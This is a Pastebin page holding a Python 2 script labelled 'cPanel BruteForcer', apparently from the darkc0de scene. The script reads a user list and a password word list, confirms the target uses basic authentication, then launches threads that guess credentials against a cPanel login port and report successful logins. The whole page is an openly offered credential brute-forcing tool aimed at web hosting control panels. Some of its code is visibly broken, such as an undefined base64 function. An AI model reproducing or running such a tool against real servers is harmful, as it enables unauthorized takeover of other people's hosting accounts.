Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!usr/bin/python
- #cPanel BruteForcer
- #http://www.darkc0de.com
- #d3hydr8[at]gmail[dot]com
- import threading, time, random, sys, urllib2, httplib, base64
- from copy import copy
- def title():
- print "\n\t d3hydr8[at]gmail[dot]com cPanel BruteForcer v1.0"
- print "\t-----------------------------------------------------\n"
- def timer():
- now = time.localtime(time.time())
- return time.asctime(now)
- if len(sys.argv) !=5:
- title()
- print "\nUsage: ./cPanelbrute.py <server> <port> <userlist> <wordlist>\n"
- print "ex: python cPanelbrute.py example.com 2082 users.txt wordlist.txt\n"
- sys.exit(1)
- try:
- users = open(sys.argv[3], "r").readlines()
- except(IOError):
- print "Error: Check your userlist path\n"
- sys.exit(1)
- try:
- words = open(sys.argv[4], "r").readlines()
- except(IOError):
- print "Error: Check your wordlist path\n"
- sys.exit(1)
- wordlist = copy(words)
- def reloader():
- for word in wordlist:
- words.append(word)
- def getword():
- lock = threading.Lock()
- lock.acquire()
- if len(words) != 0:
- value = random.sample(words, 1)
- words.remove(value[0])
- else:
- print "\nReloading Wordlist - Changing User\n"
- reloader()
- value = random.sample(words, 1)
- users.remove(users[0])
- lock.release()
- if len(users) ==1:
- return users[0], value[0][:-1]
- else:
- return users[0][:-1], value[0][:-1]
- def getauth(url):
- req = urllib2.Request(url)
- try:
- handle = urllib2.urlopen(req)
- except IOError, e:
- pass
- else:
- print "This page isn't protected by basic authentication.\n"
- sys.exit(1)
- if not hasattr(e, 'code') or e.code != 401:
- print "\nThis page isn't protected by basic authentication."
- print 'But we failed for another reason.\n'
- sys.exit(1)
- authline = e.headers.get('www-authenticate', '')
- if not authline:
- print '\nA 401 error without a basic authentication response header - very weird.\n'
- sys.exit(1)
- else:
- return authline
- class Worker(threading.Thread):
- def run(self):
- username, password = getword()
- try:
- print "-"*12
- print "User:",username,"Password:",password
- auth_handler = urllib2.HTTPBasicAuthHandler()
- auth_handler.add_password("cPanel", server, base64encodestring(username)[:-1], base64encodestring(password)[:-1])
- opener = urllib2.build_opener(auth_handler)
- urllib2.install_opener(opener)
- urllib2.urlopen(server)
- print "\t\n\nUsername:",username,"Password:",password,"----- Login successful!!!\n\n"
- except (urllib2.HTTPError, httplib.BadStatusLine), msg:
- #print "An error occurred:", msg
- pass
- title()
- if sys.argv[1][-1] == "/":
- sys.argv[1] = sys.argv[1][:-1]
- server = sys.argv[1]+":2082"
- if sys.argv[2].isdigit() == False:
- print "[-] Port must be a number\n"
- sys.exit(1)
- else:
- port = sys.argv[2]
- if sys.argv[1][-1] == "/":
- sys.argv[1] = sys.argv[1][:-1]
- server = sys.argv[1]+":"+port
- print "[+] Server:",server
- print "[+] Port:",port
- print "[+] Users Loaded:",len(users)
- print "[+] Words Loaded:",len(words)
- print "[+]",getauth(server)
- print "[+] Started",timer(),"\n"
- for i in range(len(words)*len(users)):
- work = Worker()
- work.setDaemon(1)
- work.start()
- time.sleep(1)
- print "\n[-] Done -",timer(),"\n"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement